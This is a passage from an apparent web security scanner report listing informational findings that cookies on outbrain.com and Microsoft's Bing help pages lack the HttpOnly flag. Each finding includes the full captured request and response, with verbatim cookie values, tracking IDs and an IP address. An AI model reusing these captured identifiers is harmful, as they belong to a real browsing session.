Set-Cookie: nbuuid=e86aa901c303413980596abf8e04d882; expires=Tue, 12 Jul 2011 08:50:11 GMT; path=/; domain=.mobileweb.ebay.com
Content-Type: text/html;charset=utf-8
Content-Length: 26822
Date: Tue, 19 Jul 2011 18:40:03 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><head><META http-equiv="Content-Type" content="text/html; charset=utf-8"><META HTTP-EQUIV="
...[SNIP]...

14.84. http://odb.outbrain.com/utils/get  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://odb.outbrain.com
Path:   /utils/get

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /utils/get?url=http%3A%2F%2Fwww.boston.com%2FBoston%2Fbusinessupdates%2F2011%2F07%2Fstate-street-announces-more-job-cuts%2F2Ah9Wno4Q7WHDubEEBBYLN%2Findex.html&srcUrl=http%3A%2F%2Fwww.boston.com%2Fbusiness%2Fticker%2F&settings=true&recs=true&widgetJSId=AR_1&key=AYQHSUWJ8576&idx=0&version=40506&ref=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue&apv=false&rand=0.39396007347768847&sig=s_ppv HTTP/1.1
Host: odb.outbrain.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.boston.com/Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7WHDubEEBBYLN/index.html?p1=News_links
Cookie: obuid=34e83892-8848-4a54-a4d4-8bdbba750320; _lvs2="1tAU7QKQIVo="; _rcc2="c5YqA63GvjSl+Ov6ordflA=="

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-cache
Pragma: no-cache
Set-Cookie: tick=1311108255065; Domain=outbrain.com; Path=/
P3P: policyref="http://www.outbrain.com/w3c/p3p.xml",CP="NOI NID CURa DEVa TAIa PSAa PSDa OUR IND UNI"
Set-Cookie: _lvs2="O2ZXNI+sQ3qFHV61t3sdYQ=="; Version=1; Domain=outbrain.com; Max-Age=33868800; Expires=Tue, 14-Aug-2012 20:44:15 GMT; Path=/
Set-Cookie: _lvd2="iYJQahqaNoybZPBlL1y+oQ=="; Version=1; Domain=outbrain.com; Max-Age=564480; Expires=Tue, 26-Jul-2011 09:32:15 GMT; Path=/
Set-Cookie: _rcc2="c5YqA63GvjSl+Ov6ordflA=="; Version=1; Domain=outbrain.com; Max-Age=33868800; Expires=Tue, 14-Aug-2012 20:44:15 GMT; Path=/
Set-Cookie: recs-ad82f50455df441759d1d8530ecdbaac="QHChs7CRExG12Ow/i/bhLoTOUAVA7ck9pHYzRgDMxFx+vgba/12gWJv6sgRAr7jYeFcfE+OdrabgVFZDw9TGi+6jLuHWn5mlULTTird7SsSJakbqdZgl2fl7pZFJ8vmZeVMaUm5Ix9l5WOXcO9UcZQ=="; Version=1; Domain=outbrain.com; Max-Age=300; Expires=Tue, 19-Jul-2011 20:49:15 GMT; Path=/
Content-Type: text/x-json;charset=UTF-8
Vary: Accept-Encoding
Date: Tue, 19 Jul 2011 20:44:14 GMT
Content-Length: 9127

outbrain_rater.returnedOdbData({'response':{'exec_time':16,'status':{'id':0,'content':'Request succeeded'},'request':{'did':'218543332','req_id':'1f90121845ccabe94998d7832ea7afec'},'score':{'preferred
...[SNIP]...

14.85. http://onlinehelp.microsoft.com/en-US/bing/ff808535.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://onlinehelp.microsoft.com
Path:   /en-US/bing/ff808535.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en-US/bing/ff808535.aspx HTTP/1.1
Host: onlinehelp.microsoft.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/search?q=xss.cx&go=&qs=n&sk=&sc=3-4&qb=1&FORM=AXRE
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=b99db294605ea749842ddaca50c2f3af&HASH=94b2&LV=20115&V=3; _opt_vi_X19C7L9U=1097A557-F243-4650-B6F9-421C7E65E189; MUID=E361C23374E642C998D8ABA7166A75EC; ixpLightBrowser=0; _vis_opt_s=1%7C; s_nr=1307360954509-Repeat; TocHashCookie=ff524484(n)/; WT_NVR_RU=0=msdn|technet:1=:2=; stFI=Thu%2C%2021%20Jul%202011%2002%3A01%3A54%20GMT; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1308659407330%7D%2C%22lastinvited%22%3A1308659407330%2C%22userid%22%3A%2213086594073305308045977726579%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; UserState=Returning=False&LastVisit=06/21/2011 12:33:22&UserEBacExpression=+ 0|2 + 1|8 2|1024; MSPartner2=LogUser=fd88dce7-bc7d-4fc7-a268-4d7867c372fa&RegUser=; WRUID=0; A=I&I=AxUFAAAAAAB+CQAAAIpTytFFhH8oVryAJxM8/w!!&CS=12779V000119p0002h19p00; R=200000862-6/21/2011 7:34:30|200024632-6/4/2011 17:55:19; s_vnum=1311213700142%26vn%3D3; _opt_vi_64WS79UG=20593EEE-7467-4B38-8C32-E61C8EEBF7E3; mcI=Thu, 21 Jul 2011 12:52:07 GMT; msdn=L=1033; MSID=Microsoft.CreationDate=05/19/2011 01:26:30&Microsoft.LastVisitDate=07/18/2011 19:52:49&Microsoft.VisitStartDate=07/18/2011 19:42:23&Microsoft.CookieId=22aa2f89-ced8-49d1-a8ca-c4379d3e1c05&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=67&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0467-1766-8023-3891; omniID=1306014135034_717c_5c0c_c0f0_565c9892e499; WT_FPC=id=173.193.214.243-3661456592.30151123:lv=1311008316522:ss=1311004920058

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 3.0
X-AspNet-Version: 4.0.30319
Set-Cookie: TocHashCookie=ff524484(n)/ff808551(n)/; expires=Fri, 19-Jul-2041 15:16:06 GMT; path=/
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 15:16:05 GMT
Cteonnt-Length: 35993
Content-Length: 35993

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   Bing Help
</title
...[SNIP]...

14.86. http://onlinehelp.microsoft.com/en-us/bing/ff808415.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://onlinehelp.microsoft.com
Path:   /en-us/bing/ff808415.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en-us/bing/ff808415.aspx HTTP/1.1
Host: onlinehelp.microsoft.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=b99db294605ea749842ddaca50c2f3af&HASH=94b2&LV=20115&V=3; _opt_vi_X19C7L9U=1097A557-F243-4650-B6F9-421C7E65E189; MUID=E361C23374E642C998D8ABA7166A75EC; ixpLightBrowser=0; _vis_opt_s=1%7C; s_nr=1307360954509-Repeat; WT_NVR_RU=0=msdn|technet:1=:2=; stFI=Thu%2C%2021%20Jul%202011%2002%3A01%3A54%20GMT; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1308659407330%7D%2C%22lastinvited%22%3A1308659407330%2C%22userid%22%3A%2213086594073305308045977726579%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; UserState=Returning=False&LastVisit=06/21/2011 12:33:22&UserEBacExpression=+ 0|2 + 1|8 2|1024; MSPartner2=LogUser=fd88dce7-bc7d-4fc7-a268-4d7867c372fa&RegUser=; WRUID=0; A=I&I=AxUFAAAAAAB+CQAAAIpTytFFhH8oVryAJxM8/w!!&CS=12779V000119p0002h19p00; R=200000862-6/21/2011 7:34:30|200024632-6/4/2011 17:55:19; s_vnum=1311213700142%26vn%3D3; _opt_vi_64WS79UG=20593EEE-7467-4B38-8C32-E61C8EEBF7E3; mcI=Thu, 21 Jul 2011 12:52:07 GMT; msdn=L=1033; MSID=Microsoft.CreationDate=05/19/2011 01:26:30&Microsoft.LastVisitDate=07/18/2011 19:52:49&Microsoft.VisitStartDate=07/18/2011 19:42:23&Microsoft.CookieId=22aa2f89-ced8-49d1-a8ca-c4379d3e1c05&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=67&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0467-1766-8023-3891; WT_FPC=id=173.193.214.243-3661456592.30151123:lv=1311008316522:ss=1311004920058; TocHashCookie=ff524484(n)/ff808551(n)/na/; omniID=1306014135034_717c_5c0c_c0f0_565c9892e499; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 3.0
X-AspNet-Version: 4.0.30319
Set-Cookie: TocHashCookie=ff524484(n)/; expires=Fri, 19-Jul-2041 15:17:35 GMT; path=/
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 15:17:35 GMT
Cteonnt-Length: 59118
Content-Length: 59118

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   All Bing Help top
...[SNIP]...

14.87. http://onlinehelp.microsoft.com/en-us/bing/ff808465.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://onlinehelp.microsoft.com
Path:   /en-us/bing/ff808465.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en-us/bing/ff808465.aspx HTTP/1.1
Host: onlinehelp.microsoft.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=b99db294605ea749842ddaca50c2f3af&HASH=94b2&LV=20115&V=3; _opt_vi_X19C7L9U=1097A557-F243-4650-B6F9-421C7E65E189; MUID=E361C23374E642C998D8ABA7166A75EC; ixpLightBrowser=0; _vis_opt_s=1%7C; s_nr=1307360954509-Repeat; WT_NVR_RU=0=msdn|technet:1=:2=; stFI=Thu%2C%2021%20Jul%202011%2002%3A01%3A54%20GMT; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1308659407330%7D%2C%22lastinvited%22%3A1308659407330%2C%22userid%22%3A%2213086594073305308045977726579%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; UserState=Returning=False&LastVisit=06/21/2011 12:33:22&UserEBacExpression=+ 0|2 + 1|8 2|1024; MSPartner2=LogUser=fd88dce7-bc7d-4fc7-a268-4d7867c372fa&RegUser=; WRUID=0; A=I&I=AxUFAAAAAAB+CQAAAIpTytFFhH8oVryAJxM8/w!!&CS=12779V000119p0002h19p00; R=200000862-6/21/2011 7:34:30|200024632-6/4/2011 17:55:19; s_vnum=1311213700142%26vn%3D3; _opt_vi_64WS79UG=20593EEE-7467-4B38-8C32-E61C8EEBF7E3; mcI=Thu, 21 Jul 2011 12:52:07 GMT; msdn=L=1033; MSID=Microsoft.CreationDate=05/19/2011 01:26:30&Microsoft.LastVisitDate=07/18/2011 19:52:49&Microsoft.VisitStartDate=07/18/2011 19:42:23&Microsoft.CookieId=22aa2f89-ced8-49d1-a8ca-c4379d3e1c05&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=67&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0467-1766-8023-3891; WT_FPC=id=173.193.214.243-3661456592.30151123:lv=1311008316522:ss=1311004920058; TocHashCookie=ff524484(n)/ff808551(n)/na/; omniID=1306014135034_717c_5c0c_c0f0_565c9892e499; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 3.0
X-AspNet-Version: 4.0.30319
Set-Cookie: TocHashCookie=ff524484(n)/ff808551(n)/na/; expires=Fri, 19-Jul-2041 15:16:57 GMT; path=/
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 15:16:57 GMT
ntCoent-Length: 31062
Content-Length: 31062

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   Get cash back for
...[SNIP]...

14.88. http://onlinehelp.microsoft.com/en-us/bing/ff808483.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://onlinehelp.microsoft.com
Path:   /en-us/bing/ff808483.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en-us/bing/ff808483.aspx HTTP/1.1
Host: onlinehelp.microsoft.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=b99db294605ea749842ddaca50c2f3af&HASH=94b2&LV=20115&V=3; _opt_vi_X19C7L9U=1097A557-F243-4650-B6F9-421C7E65E189; MUID=E361C23374E642C998D8ABA7166A75EC; ixpLightBrowser=0; _vis_opt_s=1%7C; s_nr=1307360954509-Repeat; WT_NVR_RU=0=msdn|technet:1=:2=; stFI=Thu%2C%2021%20Jul%202011%2002%3A01%3A54%20GMT; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1308659407330%7D%2C%22lastinvited%22%3A1308659407330%2C%22userid%22%3A%2213086594073305308045977726579%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; UserState=Returning=False&LastVisit=06/21/2011 12:33:22&UserEBacExpression=+ 0|2 + 1|8 2|1024; MSPartner2=LogUser=fd88dce7-bc7d-4fc7-a268-4d7867c372fa&RegUser=; WRUID=0; A=I&I=AxUFAAAAAAB+CQAAAIpTytFFhH8oVryAJxM8/w!!&CS=12779V000119p0002h19p00; R=200000862-6/21/2011 7:34:30|200024632-6/4/2011 17:55:19; s_vnum=1311213700142%26vn%3D3; _opt_vi_64WS79UG=20593EEE-7467-4B38-8C32-E61C8EEBF7E3; mcI=Thu, 21 Jul 2011 12:52:07 GMT; msdn=L=1033; MSID=Microsoft.CreationDate=05/19/2011 01:26:30&Microsoft.LastVisitDate=07/18/2011 19:52:49&Microsoft.VisitStartDate=07/18/2011 19:42:23&Microsoft.CookieId=22aa2f89-ced8-49d1-a8ca-c4379d3e1c05&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=67&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0467-1766-8023-3891; WT_FPC=id=173.193.214.243-3661456592.30151123:lv=1311008316522:ss=1311004920058; TocHashCookie=ff524484(n)/ff808551(n)/na/; omniID=1306014135034_717c_5c0c_c0f0_565c9892e499; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 3.0
X-AspNet-Version: 4.0.30319
Set-Cookie: TocHashCookie=ff524484(n)/ff808551(n)/na/; expires=Fri, 19-Jul-2041 15:16:45 GMT; path=/
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 15:16:44 GMT
ntCoent-Length: 38647
Content-Length: 38647

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   See your search h
...[SNIP]...

14.89. http://onlinehelp.microsoft.com/en-us/bing/ff808490.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://onlinehelp.microsoft.com
Path:   /en-us/bing/ff808490.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en-us/bing/ff808490.aspx HTTP/1.1
Host: onlinehelp.microsoft.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=b99db294605ea749842ddaca50c2f3af&HASH=94b2&LV=20115&V=3; _opt_vi_X19C7L9U=1097A557-F243-4650-B6F9-421C7E65E189; MUID=E361C23374E642C998D8ABA7166A75EC; ixpLightBrowser=0; _vis_opt_s=1%7C; s_nr=1307360954509-Repeat; WT_NVR_RU=0=msdn|technet:1=:2=; stFI=Thu%2C%2021%20Jul%202011%2002%3A01%3A54%20GMT; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1308659407330%7D%2C%22lastinvited%22%3A1308659407330%2C%22userid%22%3A%2213086594073305308045977726579%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; UserState=Returning=False&LastVisit=06/21/2011 12:33:22&UserEBacExpression=+ 0|2 + 1|8 2|1024; MSPartner2=LogUser=fd88dce7-bc7d-4fc7-a268-4d7867c372fa&RegUser=; WRUID=0; A=I&I=AxUFAAAAAAB+CQAAAIpTytFFhH8oVryAJxM8/w!!&CS=12779V000119p0002h19p00; R=200000862-6/21/2011 7:34:30|200024632-6/4/2011 17:55:19; s_vnum=1311213700142%26vn%3D3; _opt_vi_64WS79UG=20593EEE-7467-4B38-8C32-E61C8EEBF7E3; mcI=Thu, 21 Jul 2011 12:52:07 GMT; msdn=L=1033; MSID=Microsoft.CreationDate=05/19/2011 01:26:30&Microsoft.LastVisitDate=07/18/2011 19:52:49&Microsoft.VisitStartDate=07/18/2011 19:42:23&Microsoft.CookieId=22aa2f89-ced8-49d1-a8ca-c4379d3e1c05&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=67&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0467-1766-8023-3891; WT_FPC=id=173.193.214.243-3661456592.30151123:lv=1311008316522:ss=1311004920058; TocHashCookie=ff524484(n)/ff808551(n)/na/; omniID=1306014135034_717c_5c0c_c0f0_565c9892e499; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 3.0
X-AspNet-Version: 4.0.30319
Set-Cookie: TocHashCookie=ff524484(n)/ff808551(n)/na/; expires=Fri, 19-Jul-2041 15:16:43 GMT; path=/
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 15:16:42 GMT
ntCoent-Length: 32067
Content-Length: 32067

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   Get search sugges
...[SNIP]...

14.90. http://onlinehelp.microsoft.com/en-us/bing/ff808492.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://onlinehelp.microsoft.com
Path:   /en-us/bing/ff808492.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en-us/bing/ff808492.aspx HTTP/1.1
Host: onlinehelp.microsoft.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=b99db294605ea749842ddaca50c2f3af&HASH=94b2&LV=20115&V=3; _opt_vi_X19C7L9U=1097A557-F243-4650-B6F9-421C7E65E189; MUID=E361C23374E642C998D8ABA7166A75EC; ixpLightBrowser=0; _vis_opt_s=1%7C; s_nr=1307360954509-Repeat; WT_NVR_RU=0=msdn|technet:1=:2=; stFI=Thu%2C%2021%20Jul%202011%2002%3A01%3A54%20GMT; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1308659407330%7D%2C%22lastinvited%22%3A1308659407330%2C%22userid%22%3A%2213086594073305308045977726579%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; UserState=Returning=False&LastVisit=06/21/2011 12:33:22&UserEBacExpression=+ 0|2 + 1|8 2|1024; MSPartner2=LogUser=fd88dce7-bc7d-4fc7-a268-4d7867c372fa&RegUser=; WRUID=0; A=I&I=AxUFAAAAAAB+CQAAAIpTytFFhH8oVryAJxM8/w!!&CS=12779V000119p0002h19p00; R=200000862-6/21/2011 7:34:30|200024632-6/4/2011 17:55:19; s_vnum=1311213700142%26vn%3D3; _opt_vi_64WS79UG=20593EEE-7467-4B38-8C32-E61C8EEBF7E3; mcI=Thu, 21 Jul 2011 12:52:07 GMT; msdn=L=1033; MSID=Microsoft.CreationDate=05/19/2011 01:26:30&Microsoft.LastVisitDate=07/18/2011 19:52:49&Microsoft.VisitStartDate=07/18/2011 19:42:23&Microsoft.CookieId=22aa2f89-ced8-49d1-a8ca-c4379d3e1c05&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=67&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0467-1766-8023-3891; WT_FPC=id=173.193.214.243-3661456592.30151123:lv=1311008316522:ss=1311004920058; omniID=1306014135034_717c_5c0c_c0f0_565c9892e499; s_cc=true; s_sq=%5B%5BB%5D%5D; TocHashCookie=ff524484(n)/ff808551(n)/na/

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 3.0
X-AspNet-Version: 4.0.30319
Set-Cookie: TocHashCookie=ff524484(n)/ff808551(n)/na/; expires=Fri, 19-Jul-2041 15:16:56 GMT; path=/
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 15:16:56 GMT
ntCoent-Length: 31031
Content-Length: 31031

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   Translate search
...[SNIP]...

14.91. http://onlinehelp.microsoft.com/en-us/bing/ff808506.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://onlinehelp.microsoft.com
Path:   /en-us/bing/ff808506.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en-us/bing/ff808506.aspx HTTP/1.1
Host: onlinehelp.microsoft.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=b99db294605ea749842ddaca50c2f3af&HASH=94b2&LV=20115&V=3; _opt_vi_X19C7L9U=1097A557-F243-4650-B6F9-421C7E65E189; MUID=E361C23374E642C998D8ABA7166A75EC; ixpLightBrowser=0; _vis_opt_s=1%7C; s_nr=1307360954509-Repeat; WT_NVR_RU=0=msdn|technet:1=:2=; stFI=Thu%2C%2021%20Jul%202011%2002%3A01%3A54%20GMT; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1308659407330%7D%2C%22lastinvited%22%3A1308659407330%2C%22userid%22%3A%2213086594073305308045977726579%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; UserState=Returning=False&LastVisit=06/21/2011 12:33:22&UserEBacExpression=+ 0|2 + 1|8 2|1024; MSPartner2=LogUser=fd88dce7-bc7d-4fc7-a268-4d7867c372fa&RegUser=; WRUID=0; A=I&I=AxUFAAAAAAB+CQAAAIpTytFFhH8oVryAJxM8/w!!&CS=12779V000119p0002h19p00; R=200000862-6/21/2011 7:34:30|200024632-6/4/2011 17:55:19; s_vnum=1311213700142%26vn%3D3; _opt_vi_64WS79UG=20593EEE-7467-4B38-8C32-E61C8EEBF7E3; mcI=Thu, 21 Jul 2011 12:52:07 GMT; msdn=L=1033; MSID=Microsoft.CreationDate=05/19/2011 01:26:30&Microsoft.LastVisitDate=07/18/2011 19:52:49&Microsoft.VisitStartDate=07/18/2011 19:42:23&Microsoft.CookieId=22aa2f89-ced8-49d1-a8ca-c4379d3e1c05&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=67&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0467-1766-8023-3891; 